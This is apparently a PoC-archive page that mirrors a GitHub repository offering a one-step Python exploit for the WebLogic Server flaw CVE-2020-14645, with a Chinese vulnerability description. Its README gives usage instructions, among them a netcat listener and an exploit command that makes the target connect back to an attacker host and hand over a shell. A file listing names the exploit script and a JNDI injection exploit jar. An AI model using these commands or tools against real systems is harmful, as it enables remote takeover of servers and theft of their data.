CVE-2020-14645 PoC — Oracle Fusion Middleware WebLogic Server Core组件安全漏洞

Source

https://github.com/Schira4396/CVE-2020-14645

Associated Vulnerability

Title:Oracle Fusion Middleware WebLogic Server Core组件安全漏洞 (CVE-2020-14645)
Description:Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server的Core组件存在安全漏洞。攻击者可利用该漏洞控制Oracle WebLogic Server，影响数据的可用性、保密性和完整性。以下产品及版本受到影响：Oracl

Description

Weblogic Server CVE-2020-14645 EXP for Python （complete in one step）

Readme

# CVE-2020-14645
Weblogic Server CVE-2020-14645 EXP for Python （complete in one step）


#### Useage: Python3 exploit.py -t \<tartget IP\> -c \<command\>
##### tips: No echo

##### Example：

nc -lvnp 4444


Python3 exploit.py -t 192.168.0.14 -c 'nc 192.168.0.15 4444'

then you will getshell

File Snapshot


 [4.0K]  /data/pocs/1d6d305db6eca1953db2dcf80e6ecc1f61704bfb
├── [ 17M]  CVE-2020-14645.jar
├── [1.7K]  exploit.py
├── [ 285]  get_ip.py
├── [9.9M]  JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
└── [ 297]  README.md

0 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!